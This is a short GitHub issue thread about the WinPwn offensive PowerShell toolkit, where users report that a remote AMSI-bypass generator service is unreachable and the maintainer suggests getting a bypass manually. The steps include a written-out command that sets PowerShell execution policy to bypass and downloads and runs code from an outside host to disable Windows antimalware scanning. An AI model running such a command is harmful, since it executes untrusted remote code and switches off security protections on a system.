### ISSUE TITLE
Error when using AMSI bypass

### ISSUE THREAD

**Issue by sp00ks-git** [S3cur3Th1sSh1t/WinPwn#13]
Appreciate you dont look after the code here but have you seen this message before?

![image](https://user-images.githubusercontent.com/56547010/97018819-7f727180-1547-11eb-8283-a205663c656c.png)

Steps
powershell -exec bypass
iex(new-object net.webclient).downloadstring('https://amsi-fail.azurewebsites.net/api/Generate')

**Comment by S3cur3Th1sSh1t** [comment]
Try to access the site manually via browser and get your bypass there (https://amsi.fail/).
Seams like an internet connectivity issue. I can´t help you here.

**Comment by b4sh1t1** [comment]
https://amsi-fail.azurewebsites.net/api/Generate down, any alternative ?

**Comment by S3cur3Th1sSh1t** [comment]
As I already wrote. Grab a bypass there manually. Or built one yourself there are plenty of resources out there on how to do it including my blog posts 🤷‍♂️
